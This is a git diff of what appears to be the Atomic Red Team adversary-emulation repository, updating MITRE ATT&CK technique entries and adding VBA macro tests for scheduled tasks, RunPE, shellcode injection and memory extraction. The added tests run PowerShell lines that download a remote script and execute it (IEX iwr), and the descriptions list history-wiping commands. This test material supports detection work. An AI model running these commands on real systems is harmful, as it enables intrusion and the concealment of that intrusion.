on malicious additions to legitimate software in software distribution or + update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil + 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired + victim set (Citation: Symantec Elderwood Sept 2012) or malicious software + may be distributed to a broad set of consumers but only move on to additional + tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command + Five SK 2011) Popular open source projects that are used as dependencies in + many applications may also be targeted as a means to add malicious code to + users of the dependency. (Citation: Trendmicro NPM Compromise)" external_references: - source_name: mitre-attack external_id: T1195 @@ -55612,7 +61360,7 @@ initial-access: description: IBM Support. (2017, April 26). Storwize USB Initialization Tool may contain malicious code. Retrieved May 28, 2019. - source_name: Schneider Electric USB Malware - url: https://www.schneider-electric.com/en/download/document/SESN-2018-236-01/ + url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/ description: Schneider Electric. (2018, August 24). Security Notification – USB Removable Media Provided With Conext Combox and Conext Battery Monitor. Retrieved May 28, 2019. @@ -55638,52 +61386,30 @@ initial-access: url: https://www.trendmicro.com/vinfo/dk/security/news/cybercrime-and-digital-threats/hacker-infects-node-js-package-to-steal-from-bitcoin-wallets description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package to Steal from Bitcoin Wallets. Retrieved April 10, 2019. - description: "Adversaries may manipulate products or product delivery mechanisms - prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply - chain compromise can take place at any stage of the supply chain including:\n\n* - Manipulation of development tools\n* Manipulation of a development environment\n* - Manipulation of source code repositories (public or private)\n* Manipulation - of source code in open-source dependencies\n* Manipulation of software update/distribution - mechanisms\n* Compromised/infected system images (multiple cases of removable - media infected at the factory) (Citation: IBM Storwize) (Citation: Schneider - Electric USB Malware) \n* Replacement of legitimate software with modified - versions\n* Sales of modified/counterfeit products to legitimate distributors\n* - Shipment interdiction\n\nWhile supply chain compromise can impact any component - of hardware or software, attackers looking to gain execution have often focused - on malicious additions to legitimate software in software distribution or - update channels. (Citation: Avast CCleaner3 2018) (Citation: Microsoft Dofoil - 2018) (Citation: Command Five SK 2011) Targeting may be specific to a desired - victim set (Citation: Symantec Elderwood Sept 2012) or malicious software - may be distributed to a broad set of consumers but only move on to additional - tactics on specific victims. (Citation: Avast CCleaner3 2018) (Citation: Command - Five SK 2011) Popular open source projects that are used as dependencies in - many applications may also be targeted as a means to add malicious code to - users of the dependency. (Citation: Trendmicro NPM Compromise)" - name: Supply Chain Compromise - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--3f18edba-28f4-4bb9-82c3-8aa60dcac5f7 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T12:51:45.574Z' + modified: '2020-10-13T12:38:32.426Z' created: '2018-04-18T17:59:24.739Z' - x_mitre_version: '1.2' - x_mitre_data_sources: - - Web proxy - - File monitoring + x_mitre_is_subtechnique: false + x_mitre_contributors: + - Veeral Patel + x_mitre_platforms: + - Linux + - Windows + - macOS x_mitre_detection: Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering. - x_mitre_platforms: - - Linux - - Windows - - macOS - x_mitre_contributors: - - Veeral Patel - x_mitre_is_subtechnique: false + x_mitre_data_sources: + - Web proxy + - File monitoring + x_mitre_version: '1.2' atomic_tests: [] T1199: technique: @@ -55736,13 +61462,8 @@ initial-access: atomic_tests: [] T1078: technique: - id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Valid Accounts - description: |- - Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. - - The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078 @@ -55758,8 +61479,13 @@ initial-access: description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016. source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -55770,13 +61496,31 @@ initial-access: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-06-20T22:44:36.043Z' + modified: '2020-10-19T16:01:22.724Z' created: '2017-05-31T21:31:00.645Z' - x_mitre_is_subtechnique: false - x_mitre_contributors: - - Netskope - - Mark Wee - - Praetorian + x_mitre_version: '2.1' + x_mitre_data_sources: + - AWS CloudTrail logs + - Stackdriver logs + - Authentication logs + - Process monitoring + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator x_mitre_platforms: - Linux - macOS @@ -55787,27 +61531,9 @@ initial-access: - SaaS - Office 365 - Azure AD - x_mitre_effective_permissions: - - User - - Administrator - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. - x_mitre_defense_bypassed: - - Firewall - - Host intrusion prevention systems - - Network intrusion detection system - - Application control - - System access controls - - Anti-virus - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_version: '2.1' + x_mitre_contributors: + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false atomic_tests: [] diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index 4a10e2cb..eff14164 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -2,9 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1018)
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or net view using [Net](https://attack.mitre.org/software/S0039). Adversaries may also use local host files (ex: C:\Windows\System32\Drivers\etc\hosts or /etc/hosts) in order to discover the hostname to IP address mappings of remote systems. -Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain. - -Within IaaS (Infrastructure as a Service) environments, remote systems include instances and virtual machines in various states, including the running or stopped state. Cloud providers have created methods to serve information about remote systems, such as APIs and CLIs. For example, AWS provides a DescribeInstances API within the Amazon EC2 API and a describe-instances command within the AWS CLI that can return information about all instances within an account.(Citation: Amazon Describe Instances API)(Citation: Amazon Describe Instances CLI) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project, and Azure's CLI az vm list lists details of virtual machines.(Citation: Google Compute Instances)(Citation: Azure VM List)
+Specific to macOS, the bonjour protocol exists to discover additional Mac-based systems within the same broadcast domain. ## Atomic Tests diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 73433250..85e5a7d6 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -16,6 +16,8 @@ An adversary may use Windows Task Scheduler to execute programs at system startu - [Atomic Test #4 - Powershell Cmdlet Scheduled Task](#atomic-test-4---powershell-cmdlet-scheduled-task) +- [Atomic Test #5 - Task Scheduler via VBA](#atomic-test-5---task-scheduler-via-vba) +
@@ -155,4 +157,52 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 +
+
+ +## Atomic Test #5 - Task Scheduler via VBA +This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within +30 - 40 seconds after this module has run + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ms_product | Maldoc application Word | String | Word| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft #{ms_product} must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" +``` + + + +
diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 4594e14d..e7fee8c7 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -101,7 +101,7 @@ atomic_tests: cleanup_command: | Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - name: Task Scheduler via VBA - auto_generated_guid: + auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index 4cd266ca..13759f6c 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -10,6 +10,8 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu - [Atomic Test #1 - Process Hollowing using PowerShell](#atomic-test-1---process-hollowing-using-powershell) +- [Atomic Test #2 - RunPE via VBA](#atomic-test-2---runpe-via-vba) +
@@ -49,4 +51,51 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore +
+
+ +## Atomic Test #2 - RunPE via VBA +This module executes calc.exe from within the WINWORD.EXE process + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ms_product | Maldoc application Word | String | Word| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft #{ms_product} must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" +``` + + + +
diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index 6bef6dbc..de8d7afe 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml @@ -34,7 +34,7 @@ atomic_tests: Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore name: powershell - name: RunPE via VBA - auto_generated_guid: + auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: | This module executes calc.exe from within the WINWORD.EXE process supported_platforms: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 30321a38..dc781f76 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -10,6 +10,8 @@ More sophisticated samples may perform multiple process injections to segment mo - [Atomic Test #1 - Process Injection via mavinject.exe](#atomic-test-1---process-injection-via-mavinjectexe) +- [Atomic Test #2 - Shellcode execution via VBA](#atomic-test-2---shellcode-execution-via-vba) +
@@ -57,4 +59,50 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #2 - Shellcode execution via VBA +This module injects shellcode into a newly created process and executes. By default the shellcode is created, +with Metasploit, for use on x86-64 Windows 10 machines. + +Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office +is required. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" +``` + + + + +#### Dependencies: Run with `powershell`! +##### Description: The 64-bit version of Microsoft Office must be installed +##### Check Prereq Commands: +```powershell +try { + $wdApp = New-Object -COMObject "Word.Application" + $path = $wdApp.Path + Stop-Process -Name "winword" + if ($path.contains("(x86)")) { exit 1 } else { exit 0 } +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" +``` + + + +
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index b97c2f1d..3d75a255 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -35,7 +35,7 @@ atomic_tests: name: powershell elevation_required: true - name: Shellcode execution via VBA - auto_generated_guid: + auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 description: | This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index c1e605f5..90768a2d 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -7,7 +7,8 @@ Keylogging is the most prevalent type of input capture, with many different ways * Hooking API callbacks used for processing keystrokes. Unlike [Credential API Hooking](https://attack.mitre.org/techniques/T1056/004), this focuses solely on API functions intended for processing keystroke data. * Reading raw keystroke data from the hardware buffer. * Windows Registry modifications. -* Custom drivers. +* Custom drivers. +* [Modify System Image](https://attack.mitre.org/techniques/T1601) may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions.(Citation: Cisco Blog Legacy Device Attacks) ## Atomic Tests diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md index 2a4d379f..a5a12710 100644 --- a/atomics/T1056.002/T1056.002.md +++ b/atomics/T1056.002/T1056.002.md @@ -1,6 +1,6 @@ # T1056.002 - GUI Input Capture ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1056/002) -
Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)). +
Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)). Adversaries may mimic this functionality to prompt users for credentials with a seemingly legitimate prompt for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite.(Citation: OSX Malware Exploits MacKeeper) This type of prompt can be used to collect credentials via various languages such as AppleScript(Citation: LogRhythm Do You Trust Oct 2014)(Citation: OSX Keydnap malware) and PowerShell(Citation: LogRhythm Do You Trust Oct 2014)(Citation: Enigma Phishing for Credentials Jan 2015).
diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md index aa4127f1..f748438d 100644 --- a/atomics/T1059.002/T1059.002.md +++ b/atomics/T1059.002/T1059.002.md @@ -1,10 +1,12 @@ # T1059.002 - AppleScript ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/002) -
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. (Citation: Apple AppleScript) These AppleEvent messages can be easily scripted with AppleScript for local or remote execution. +
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. -osascript executes AppleScript and any other Open Scripting Architecture (OSA) language scripts. A list of OSA languages installed on a system can be found by using the osalang program. AppleEvent messages can be sent independently or as part of a script. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely. +Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here". Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding #!/usr/bin/osascript to the start of the script file.(Citation: SentinelOne AppleScript) -Adversaries can use this to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally though), but can interact with applications if they're already running remotely. Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006)(Citation: Macro Malware Targets Macs). Scripts can be run from the command-line via osascript /path/to/script or osascript -e "script here".
+AppleScripts do not need to call osascript to execute, however. They may be executed from within mach-O binaries by using the macOS [Native API](https://attack.mitre.org/techniques/T1106)s NSAppleScript or OSAScript, both of which execute code independent of the /usr/bin/osascript command line utility. + +Adversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://attack.mitre.org/techniques/T1106)s, which otherwise would require compilation and execution in a mach-O binary file format.(Citation: SentinelOne macOS Red Team). Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://attack.mitre.org/techniques/T1059/006).(Citation: Macro Malware Targets Macs)
## Atomic Tests diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md index 6c5c879f..334ad38e 100644 --- a/atomics/T1059.003/T1059.003.md +++ b/atomics/T1059.003/T1059.003.md @@ -14,7 +14,7 @@ Adversaries may leverage cmd.exe to execute various commands and pa
## Atomic Test #1 - Create and Execute Batch Script -Creates and executes a simple batch script. Upon execution, CMD will briefly launh to run the batch script then close again. +Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again. **Supported Platforms:** Windows diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index eae563f3..8863238d 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1059/005)
Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) -Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Office applications.(Citation: Microsoft VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) +Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript/JScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.
@@ -12,6 +12,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious - [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution) +- [Atomic Test #3 - Extract Memory via VBA](#atomic-test-3---extract-memory-via-vba) +
@@ -112,4 +114,57 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th +
+
+ +## Atomic Test #3 - Extract Memory via VBA +This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this +we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that +memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.bin. + +**Supported Platforms:** Windows + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| ms_product | Maldoc application Word | String | Word| + + +#### Attack Commands: Run with `powershell`! + + +```powershell +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") +Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" +``` + +#### Cleanup Commands: +```powershell +Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore +``` + + + +#### Dependencies: Run with `powershell`! +##### Description: Microsoft #{ms_product} must be installed +##### Check Prereq Commands: +```powershell +try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 +} catch { exit 1 } +``` +##### Get Prereq Commands: +```powershell +Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" +``` + + + +
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index 53b543be..73a171ac 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml @@ -61,7 +61,7 @@ atomic_tests: name: powershell - name: Extract Memory via VBA - auto_generated_guid: + auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 description: | This module attempts to emulate malware authors utilizing well known techniques to extract data from memory/binary files. To do this we first create a string in memory then pull out the pointer to that string. Finally, it uses this pointer to copy the contents of that diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md index 380be0f8..0d630a36 100644 --- a/atomics/T1070.003/T1070.003.md +++ b/atomics/T1070.003/T1070.003.md @@ -1,10 +1,16 @@ # T1070.003 - Clear Command History ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1070/003) -
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. macOS and Linux both keep track of the commands users type in their terminal so that users can retrace what they've done. +
In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. -These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. +On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The benefit of this is that it allows users to go back to commands they've used before in different sessions. -Adversaries can use a variety of methods to prevent their own commands from appear in these logs, such as clearing the history environment variable (unset HISTFILE), setting the command history size to zero (export HISTFILESIZE=0), manually clearing the history (history -c), or deleting the bash history file rm ~/.bash_history.
+Adversaries may delete their commands from these logs by manually clearing the history (history -c) or deleting the bash history file rm ~/.bash_history. + +On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the PSReadLine module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends. + +The PSReadLine command history tracks the commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History) + +Adversaries may run the PowerShell command Clear-History to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the ConsoleHost_history.txt file. Adversaries may also delete the ConsoleHost_history.txt file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
## Atomic Tests diff --git a/atomics/T1095/T1095.md b/atomics/T1095/T1095.md index 4c42e643..625bd04f 100644 --- a/atomics/T1095/T1095.md +++ b/atomics/T1095/T1095.md @@ -2,7 +2,8 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1095)
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL). -ICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
+ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) + Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
## Atomic Tests diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index f2b17cd7..ddfcb084 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -12,6 +12,8 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit - [Atomic Test #3 - Execute commands from clipboard](#atomic-test-3---execute-commands-from-clipboard) +- [Atomic Test #4 - Collect Clipboard Data via VBA](#atomic-test-4---collect-clipboard-data-via-vba) +
@@ -92,4 +94,56 @@ $(pbpaste) +
+
